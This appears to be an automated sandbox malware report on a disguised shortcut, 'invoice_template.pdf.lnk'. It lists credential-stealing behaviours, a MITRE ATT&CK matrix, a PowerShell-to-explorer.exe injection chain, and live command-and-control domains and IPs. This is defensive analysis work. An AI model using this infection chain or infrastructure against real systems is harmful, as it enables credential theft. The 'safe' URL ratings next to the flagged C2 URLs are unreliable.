        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002F0030 GetLocalTime,13_2_002F0030
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002F0722 GetUserNameW,13_2_002F0722
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002E416A GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,13_2_002E416A
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeCode function: 3_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,3_2_00406805

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 0000000F.00000002.20019876866.0000000002950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.20020080729.0000000002C31000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.24415374233.0000000000A21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.24415691704.0000000003431000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 808, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4480, type: MEMORYSTR
        Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
        Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
        Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
        Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: fejhsitBinary or memory string: WIN_81
        Source: fejhsitBinary or memory string: WIN_XP
        Source: fejhsitBinary or memory string: WIN_XPe
        Source: fejhsitBinary or memory string: WIN_VISTA
        Source: fejhsitBinary or memory string: WIN_7
        Source: fejhsitBinary or memory string: WIN_8
        Source: fejhsit.16.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
        Source: C:\Users\user\AppData\Roaming\fejhsitDirectory queried: C:\Users\user\Documents
        Source: C:\Users\user\AppData\Roaming\fejhsitDirectory queried: C:\Users\user\Documents
        Source: C:\Users\user\AppData\Roaming\fejhsitDirectory queried: C:\Users\user\Documents
        Source: C:\Users\user\AppData\Roaming\fejhsitDirectory queried: C:\Users\user\Documents
        Source: C:\Users\user\AppData\Roaming\fejhsitDirectory queried: C:\Users\user\Documents
        Source: C:\Users\user\AppData\Roaming\fejhsitDirectory queried: C:\Users\user\Documents
        Source: C:\Users\user\AppData\Roaming\fejhsitDirectory queried: C:\Users\user\Documents

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 0000000F.00000002.20019876866.0000000002950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.20020080729.0000000002C31000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.24415374233.0000000000A21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.24415691704.0000000003431000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 808, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4480, type: MEMORYSTR
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_0032696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,13_2_0032696E
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_00326E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,13_2_00326E32
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0095696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,17_2_0095696E
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_00956E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,17_2_00956E32
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting
        2
        Valid Accounts
        1
        Windows Management Instrumentation
        1
        Scripting
        1
        Exploitation for Privilege Escalation
        1
        Disable or Modify Tools
        1
        OS Credential Dumping
        2
        System Time Discovery
        Remote Services1
        Archive Collected Data
        3
        Ingress Tool Transfer
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts2
        Native API
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        11
        Deobfuscate/Decode Files or Information
        21
        Input Capture
        1
        Account Discovery
        Remote Desktop Protocol11
        Data from Local System
        12
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Exploitation for Client Execution
        2
        Valid Accounts
        2
        Valid Accounts
        12
        Obfuscated Files or Information
        1
        Credentials in Registry
        13
        File and Directory Discovery
        SMB/Windows Admin Shares1
        Email Collection
        3
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts1
        Command and Scripting Interpreter
        1
        Registry Run Keys / Startup Folder
        21
        Access Token Manipulation
        1
        Software Packing
        NTDS129
        System Information Discovery
        Distributed Component Object Model21
        Input Capture
        114
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud Accounts5
        PowerShell
        Network Logon Script612
        Process Injection
        1
        Timestomp
        LSA Secrets1
        Query Registry
        SSH3
        Clipboard Data
        Fallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
        Registry Run Keys / Startup Folder
        1
        DLL Side-Loading
        Cached Domain Credentials541
        Security Software Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items221
        Masquerading
        DCSync231
        Virtualization/Sandbox Evasion
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
        Valid Accounts
        Proc Filesystem14
        Process Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt231
        Virtualization/Sandbox Evasion
        /etc/passwd and /etc/shadow11
        Application Window Discovery
        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
        Access Token Manipulation
        Network Sniffing1
        System Owner/User Discovery
        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd612
        Process Injection
        Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
        Hidden Files and Directories
        KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1550361 Sample: invoice_template.pdf.lnk Startdate: 06/11/2024 Architecture: WINDOWS Score: 100 68 zYiUXMmoWYKVkgToRt.zYiUXMmoWYKVkgToRt 2->68 70 quantumqube.org 2->70 72 innovixus.org 2->72 80 Suricata IDS alerts for network traffic 2->80 82 Found malware configuration 2->82 84 Malicious sample detected (through community Yara rule) 2->84 86 13 other signatures 2->86 12 powershell.exe 20 2->12         started        16 fejhsit 2->16         started        signatures3 process4 file5 58 C:\Users\user\AppData\Local\Temp\winpdf.exe, PE32 12->58 dropped 122 Found suspicious powershell code related to unpacking or dynamic code loading 12->122 124 Powershell creates an autostart link 12->124 126 Powershell drops PE file 12->126 18 winpdf.exe 20 12->18         started        21 conhost.exe 1 12->21         started        signatures6 process7 signatures8 78 Windows shortcut file (LNK) starts blacklisted processes 18->78 23 cmd.exe 3 18->23         started        process9 file10 54 C:\Users\user\AppData\...\Productive.pif, PE32 23->54 dropped 96 Windows shortcut file (LNK) starts blacklisted processes 23->96 98 Drops PE files with a suspicious file extension 23->98 27 Productive.pif 23->27         started        30 cmd.exe 2 23->30         started        32 conhost.exe 23->32         started        34 7 other processes 23->34 signatures11 process12 signatures13 108 Found API chain indicative of debugger detection 27->108 110 Injects a PE file into a foreign processes 27->110 112 Switches to a custom stack to bypass stack traces 27->112 36 Productive.pif 27->36         started        process14 signatures15 88 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 36->88 90 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 36->90 92 Maps a DLL or memory area into another process 36->92 94 2 other signatures 36->94 39 explorer.exe 9 13 36->39 injected process16 dnsIp17 74 innovixus.org 150.241.91.218, 49754, 49756, 49757 TECNALIAES Spain 39->74 76 quantumqube.org 85.192.60.190, 443, 49750, 49751 LINEGROUP-ASRU Russian Federation 39->76 56 C:\Users\user\AppData\Roaming\fejhsit, PE32 39->56 dropped 100 System process connects to network (likely due to code injection or exploit) 39->100 102 Benign windows process drops PE files 39->102 104 Injects code into the Windows Explorer (explorer.exe) 39->104 106 2 other signatures 39->106 44 explorer.exe 39->44         started        47 explorer.exe 39->47         started        50 explorer.exe 39->50         started        52 4 other processes 39->52 file18 signatures19 process20 file21 114 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 44->114 116 Tries to steal Mail credentials (via file / registry access) 44->116 118 Tries to harvest and steal browser information (history, passwords, etc) 44->118 60 C:\...\Windows.ApplicationModel.Wallet.dll, PE32 47->60 dropped 62 C:\Users\user\AppData\...\WalletProxy.dll, PE32 47->62 dropped 64 C:\Users\...\WalletBackgroundServiceProxy.dll, PE32 47->64 dropped 66 11 other files (none is malicious) 47->66 dropped 120 System process connects to network (likely due to code injection or exploit) 47->120 signatures22

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        invoice_template.pdf.lnk14%ReversingLabs
        invoice_template.pdf.lnk100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\367647\Productive.pif5%ReversingLabs
        C:\Users\user\AppData\Local\Temp\744\C\Windows\SysWOW64\WalletBackgroundServiceProxy.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\744\C\Windows\SysWOW64\WalletProxy.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\744\C\Windows\SysWOW64\Windows.ApplicationModel.Wallet.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\744\C\Windows\System32\WalletBackgroundServiceProxy.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\744\C\Windows\System32\WalletProxy.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\744\C\Windows\System32\Windows.ApplicationModel.Wallet.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\amd64_microsoft-windows-w..-service.deployment_31bf3856ad364e35_10.0.19041.985_none_b6bad888bc038c2c\WalletService.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\amd64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_fa16cd4ceba3021a\WalletBackgroundServiceProxy.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\amd64_microsoft-windows-w..t-service.resources_31bf3856ad364e35_10.0.19041.1_en-us_0e357aa451e0d2d7\WalletService.dll.mui0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\amd64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_5f44912b33b38332\WalletProxy.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\amd64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_a953dd8b163491ed\Windows.ApplicationModel.Wallet.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\wow64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_046b779f2003c415\WalletBackgroundServiceProxy.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\wow64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_69993b7d6814452d\WalletProxy.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\wow64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_b3a887dd4a9553e8\Windows.ApplicationModel.Wallet.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\fejhsit5%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
        http://quantumqube.org/index.php0%Avira URL Cloudsafe
        https://quantumqube.org/index.php0%Avira URL Cloudsafe
        http://innovixus.org/index.phpMozilla/5.00%Avira URL Cloudsafe
        https://go.microsoft.co80%Avira URL Cloudsafe
        https://android.notify.windows.com/iOSy0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGB80%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/bi0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark0%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
        http://schemas.microH0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%Avira URL Cloudsafe
        http://www.quovadis.bm00%Avira URL Cloudsafe
        https://outlook.com_0%Avira URL Cloudsafe
        https://android.notify.windows.com/iOS0%Avira URL Cloudsafe
        http://innovixus.org/index.php660%Avira URL Cloudsafe
        http://pesterbdd.com/images/Pester.pngXz$0%Avira URL Cloudsafe
        http://innovixus.org/0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%Avira URL Cloudsafe
        https://android.notify.windows.com/iOSds0%Avira URL Cloudsafe
        http://innovixus.org/application/x-www-form-urlencodedMozilla/5.00%Avira URL Cloudsafe
        http://schemas.micro0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGB8-dark0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb0%Avira URL Cloudsafe
        http://innovixus.org/index.phpt0%Avira URL Cloudsafe
        http://crl.mD0%Avira URL Cloudsafe
        https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm0%Avira URL Cloudsafe
        http://innovixus.org/ndex.php0%Avira URL Cloudsafe
        http://www.foreca.com0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm-dark0%Avira URL Cloudsafe
        http://innovixus.org:80/index.php110%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gD5m0%Avira URL Cloudsafe
        http://innovixus.org/index.php0%Avira URL Cloudsafe
        https://powerpoint.office.comEM_0%Avira URL Cloudsafe
        http://innovixus.org/Q0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gD5m-dark0%Avira URL Cloudsafe
        https://innovixus.org/index.php0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        innovixus.org
        150.241.91.218
        truetrue
          unknown
          quantumqube.org
          85.192.60.190
          truetrue
            unknown
            zYiUXMmoWYKVkgToRt.zYiUXMmoWYKVkgToRt
            unknown
            unknowntrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://quantumqube.org/index.phptrue
              • Avira URL Cloud: safe
              unknown
              https://quantumqube.org/index.phptrue
              • Avira URL Cloud: safe
              unknown
              http://innovixus.org/index.phptrue
              • Avira URL Cloud: safe
              unknown
              https://innovixus.org/index.phptrue
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://www.msn.com/en-us/money/markets/trump-s-comeback-reverberates-through-markets/ar-AA1tzSZJexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                high
                https://www.msn.com/en-us/news/politics/russia-blamed-for-bomb-threats-at-polling-sites-in-georgia-aexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                  high
                  https://duckduckgo.com/chrome_newtabexplorer.exe, 00000012.00000003.20230614437.0000000003670000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.20228308712.000000000365F000.00000004.00000020.00020000.00000000.sdmp, F42C.tmp.18.dr, F519.tmp.18.drfalse
                    high
                    https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchexplorer.exe, 00000012.00000003.20230614437.0000000003670000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.20228308712.000000000365F000.00000004.00000020.00020000.00000000.sdmp, F42C.tmp.18.dr, F519.tmp.18.drfalse
                      high
                      https://duckduckgo.com/ac/?q=F519.tmp.18.drfalse
                        high
                        https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240908.1/Weather/W01_Sunnexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                          high
                          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000010.00000000.20005267451.000000000CC75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                            high
                            https://www.msn.com/en-us/money/other/a-youtuber-asked-a-group-of-americans-aged-70-to-80-what-theirexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                              high
                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/taskbar_v10/explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                https://go.microsoft.co8powershell.exe, 00000000.00000002.19477320488.0000024CC1360000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.autoitscript.com/autoit3/winpdf.exe, 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmp, winpdf.exe, 00000003.00000003.19328350189.000000000502F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20175205390.0000000011C9D000.00000004.00000001.00020000.00000000.sdmp, Productive.pif.4.dr, Fluid.3.dr, fejhsit.16.drfalse
                                  high
                                  https://www.msn.com/en-us/news/politics/devastated-harris-voters-conclude-america-hates-women-as-truexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    https://www.msn.com/en-us/news/politics/why-i-was-wrong-allan-lichtman-fails-to-predict-correct-outcexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      http://innovixus.org/index.phpMozilla/5.0explorer.exe, 00000012.00000002.20536514758.00000000035F8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.20227321844.0000000001230000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.24416336097.0000000003298000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.24416107223.00000000005D9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.24416556397.0000000003727000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.24415732892.0000000000A69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.24416673585.0000000000A68000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.msn.com/en-us/news/politics/republican-tim-sheehy-unseats-democratic-us-senator-jon-testexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        https://android.notify.windows.com/iOSyexplorer.exe, 00000010.00000003.20181413547.0000000008F0E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.20000280078.0000000008F0E000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 00000012.00000003.20230614437.0000000003670000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.20228308712.000000000365F000.00000004.00000020.00020000.00000000.sdmp, F42C.tmp.18.dr, F519.tmp.18.drfalse
                                          high
                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/AAehR3S.svgexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.19418224376.0000024CA9081000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.autoitscript.com/autoit3/Jwinpdf.exe, 00000003.00000003.19328350189.000000000502F000.00000004.00000020.00020000.00000000.sdmp, Productive.pif, 0000000D.00000000.19350735168.0000000000379000.00000002.00000001.01000000.00000009.sdmp, Productive.pif, 0000000F.00000002.20019196014.0000000000379000.00000002.00000001.01000000.00000009.sdmp, explorer.exe, 00000010.00000003.20175205390.0000000011C9D000.00000004.00000001.00020000.00000000.sdmp, fejhsit, 00000011.00000002.24416250287.00000000009A9000.00000002.00000001.01000000.0000000B.sdmp, Productive.pif.4.dr, Fluid.3.dr, fejhsit.16.drfalse
                                                  high
                                                  https://api.msn.com/v1/news/Feed/Windows?p%explorer.exe, 00000010.00000000.20005267451.000000000CC75000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    https://word.office.comexplorer.exe, 00000010.00000000.20005267451.000000000D11E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20175747227.000000000D11E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.19477320488.0000024CC133D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19418224376.0000024CA92A8000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://github.com/Pester/PesterXz$powershell.exe, 00000000.00000002.19418224376.0000024CA92A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.19477320488.0000024CC133D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19418224376.0000024CA92A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://contoso.com/Iconpowershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=F519.tmp.18.drfalse
                                                              high
                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/biexplorer.exe, 00000010.00000000.20000280078.0000000008E50000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGB8explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
